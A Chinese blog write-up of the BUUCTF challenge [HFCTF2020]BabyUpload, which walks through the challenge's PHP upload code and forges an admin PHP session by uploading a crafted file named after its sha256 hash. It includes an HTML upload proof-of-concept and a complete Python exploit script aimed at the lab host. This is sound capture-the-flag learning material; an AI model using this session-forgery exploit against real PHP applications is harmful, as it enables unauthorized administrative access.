[HFCTF2020]BabyUpload

paidx0

已于 2022-08-17 03:56:42 修改

阅读量146

点赞数

分类专栏： Buuctf刷题篇文章标签：学习

于 2022-08-17 03:51:15 首次发布

本文链接：https://blog.csdn.net/weixin_49656607/article/details/126377231

版权

Buuctf刷题篇专栏收录该内容

41 篇文章 1 订阅

订阅专栏

题目直接给了代码

<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }
}
else{
    $_SESSION['username'] ='guest';
}
$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
    $dir_path .= "/".$_SESSION['username'];
}
if($direction === "upload"){
    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
            throw new RuntimeException('invalid upload');
        }
        $file_path = $dir_path."/".$_FILES['up_file']['name'];
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        @mkdir($dir_path, 0700, TRUE);
        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }
} elseif ($direction === "download") {
    try{
        $filename = basename(filter_input(INPUT_POST, 'filename'));
        $file_path = $dir_path."/".$filename;
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        if(!file_exists($file_path)) {
            throw new RuntimeException('file not exist');
        }
        header('Content-Type: application/force-download');
        header('Content-Length: '.filesize($file_path));
        header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
        if(readfile($file_path)){
            $download_result = "downloaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
    }
    exit;
}
?>

`一段一段分析`

这里说明需要伪造session是admin，并且存在文件 success.txt，这样才能得到 flag

<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }
}
else{
    $_SESSION['username'] ='guest';
}

这个就是一些路径和方法，如果 attr是 private 则访问特定用户的目录

$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
    $dir_path .= "/".$_SESSION['username'];
}

上传文件时，文件重命名后面接 _+ sha256(文件内容)
下载文件没什么限制，只是限制了目录遍历

if($direction === "upload"){
    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
            throw new RuntimeException('invalid upload');
        }
        $file_path = $dir_path."/".$_FILES['up_file']['name'];
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        @mkdir($dir_path, 0700, TRUE);
        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }
} elseif ($direction === "download") {
    try{
        $filename = basename(filter_input(INPUT_POST, 'filename'));
        $file_path = $dir_path."/".$filename;
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        if(!file_exists($file_path)) {
            throw new RuntimeException('file not exist');
        }
        header('Content-Type: application/force-download');
        header('Content-Length: '.filesize($file_path));
        header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
        if(readfile($file_path)){
            $download_result = "downloaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
    }

思路就是通过上传构造一个 sess_sha256 文件去伪造 admin，然后再上传一个success.txt，就可以访问到 flag了

开始正题

查看此时的 sess_phpsessid 文件
在这里插入图片描述
构造sess文件

计算下 sha256 留着备用作为 sessionid

<?php
echo hash_file("sha256","sess");

# 432b8b09e30c4a75986b719d1312b63a69f1b833ab602c9ad5f0299d1d76a5a4

现在来上传 sess和success.txt

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://aebbe98f-6ac4-4390-b37c-4a978423c44f.node4.buuoj.cn:81/" method="post" enctype="multipart/form-data">
    <label for="file">文件名：</label>
    <input type="file" name="up_file"><br>
    <input type="hidden" name="attr" value=".">
    <input type="hidden" name="direction" value="upload">
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

sess 确定是传上来了
在这里插入图片描述
success.txt 不能直接上传，因为还会拼接一个 sha256，所以要截断掉

直接修改 attr 为新的路径也是可以的

放个大佬的脚本直接索更爽

import hashlib
from io import BytesIO
import requests
import re

target_url = 'http://339a3908-1d85-4a0b-8672-04981e5218cf.node4.buuoj.cn:81/'

def BeAdmin():
    files = {
        "up_file": ("sess", BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))
    }
    data = {
        'attr': '.',
        'direction': 'upload'
    }
    url = target_url
    r = requests.post(url=url, data=data, files=files)
    session_id = hashlib.sha256('\x08usernames:5:"admin";'.encode('utf-8')).hexdigest()
    return session_id

def upload_success():
    files = {
        "up_file": ("success.txt", BytesIO('good job!'.encode('utf-8')))
    }
    data = {
        'attr': 'success.txt',
        'direction': 'upload'
    }
    url = target_url
    r = requests.post(url=url, data=data, files=files)

php_session_id = BeAdmin()
print(php_session_id)
cookies = {
    'PHPSESSID': php_session_id
}
url = target_url
s = requests.get(url)
r = requests.get(url=url, cookies=cookies)
print(r.content[len(s.content):])